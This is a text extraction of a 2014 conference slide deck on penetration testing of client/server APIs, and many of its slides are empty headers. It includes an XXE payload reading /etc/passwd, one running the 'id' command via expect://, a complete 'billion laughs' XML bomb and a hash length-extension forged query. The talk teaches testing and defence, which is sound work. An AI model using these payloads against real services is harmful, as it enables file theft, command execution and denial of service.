codefest 2014 - pentesting client/server api
DESCRIPTION
http://2014.codefest.ru/lecture/696TRANSCRIPT
Pentesting client/server API
Sergey Belov
$ whoami
© 2002—2014, Digital Security 2
• Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
What are we talking about?
© 2002—2014, Digital Security 3
API
What are we talking about?
© 2002—2014, Digital Security 4
API
Hacking via API
© 2002—2014, Digital Security 5
Hacking via API
© 2002—2014, Digital Security 6
Hacking via API
© 2002—2014, Digital Security 7
From interface to API methods
Hacking via API
© 2002—2014, Digital Security 8
Hacking via API
© 2002—2014, Digital Security 9
Hacking via API
© 2002—2014, Digital Security 10
Hacking via API
© 2002—2014, Digital Security 11
Hacking via API
© 2002—2014, Digital Security 12
What should we test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering
Developing • Stop hacks and custom implementation in API! Really
Hacking via API
© 2002—2014, Digital Security 13
Hacking via API
© 2002—2014, Digital Security 14
ZIP
Hacking via API
© 2002—2014, Digital Security 15
42 Kb…
Hacking via API
© 2002—2014, Digital Security 16
42 Kb… …10 Gb?
Hacking via API
© 2002—2014, Digital Security 17
42 Kb… …10 Gb? …100 Gb?
Hacking via API
© 2002—2014, Digital Security 18
42 Kb… …10 Gb? …100 Gb? …100 Tb?
Hacking via API
© 2002—2014, Digital Security 19
42 Kb… …10 Gb? …100 Gb? …100 Tb?
…4.5 Pb! http://www.unforgettable.dk/
Hacking via API
© 2002—2014, Digital Security 20
Say HELLO
to ZIP BOMB!
Hacking via API
© 2002—2014, Digital Security 21
The evil of JavaScript and
Hacking via API
© 2002—2014, Digital Security 22
Hacking via API
© 2002—2014, Digital Security 23
Hacking via API
© 2002—2014, Digital Security 24
http://habrahabr.ru/post/186160/
Hacking via API
© 2002—2014, Digital Security 25
Crypto
Hacking via API
© 2002—2014, Digital Security 26
Query signing Sign = sha*(…+DATA+…)
APIkey
Hacking via API
© 2002—2014, Digital Security 27
Hacking via API
© 2002—2014, Digital Security 28
But why?
Hacking via API
© 2002—2014, Digital Security 29
Say hello again. To length extension attack
Hacking via API
© 2002—2014, Digital Security 30
A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
Hacking via API
© 2002—2014, Digital Security 31
Some have hijacked just 1 request…
Hacking via API
© 2002—2014, Digital Security 32
What does the attacker know? • Original data • Sign (token)
Hacking via API
© 2002—2014, Digital Security 33
What does the attacker want?
Change some data / change params
Hacking via API
© 2002—2014, Digital Security 34
A=1&B=2&C=3\x80\x00\x00…\x02&C=4
Hacking via API
© 2002—2014, Digital Security 35
Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
Hacking via API
© 2002—2014, Digital Security 36
Request hijacking… How?
Hacking via API
© 2002—2014, Digital Security 37
Hacking via API
© 2002—2014, Digital Security 38
Hacking via API
© 2002—2014, Digital Security 39
Hacking via API
© 2002—2014, Digital Security 40
Hacking via API
© 2002—2014, Digital Security 41
Hacking via API
© 2002—2014, Digital Security 42
Hacking via API
© 2002—2014, Digital Security 43
Hacking via API
© 2002—2014, Digital Security 44
Hacking via API
© 2002—2014, Digital Security 45
XML? XML entities!
Hacking via API
© 2002—2014, Digital Security 46
DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;©right;</author>
Hacking via API
© 2002—2014, Digital Security 47
XML entities? External Entity!
Hacking via API
© 2002—2014, Digital Security 48
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
Hacking via API
© 2002—2014, Digital Security 49
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
Hacking via API
© 2002—2014, Digital Security 50
XML Bombs!
Hacking via API
© 2002—2014, Digital Security 51
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
What are we talking about?
© 2002—2014, Digital Security 52
Man in the Middle
Hacking via API
© 2002—2014, Digital Security 53
Examples?
Hacking via API
© 2002—2014, Digital Security 54
2013-11-19 by Reginaldo Silva
Hacking via API
© 2002—2014, Digital Security 55
https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
Hacking via API
© 2002—2014, Digital Security 56
Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896
Development: • Disable entities
Hacking via API
© 2002—2014, Digital Security 57
Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
twitter.com/sergeybelove
Digital Security в Москве: (495) 223-07-86
Digital Security в Санкт-Петербурге: (812) 703-15-47
Hacking via API
Thanks for your attention! Questions?
© 2002—2014, Digital Security 58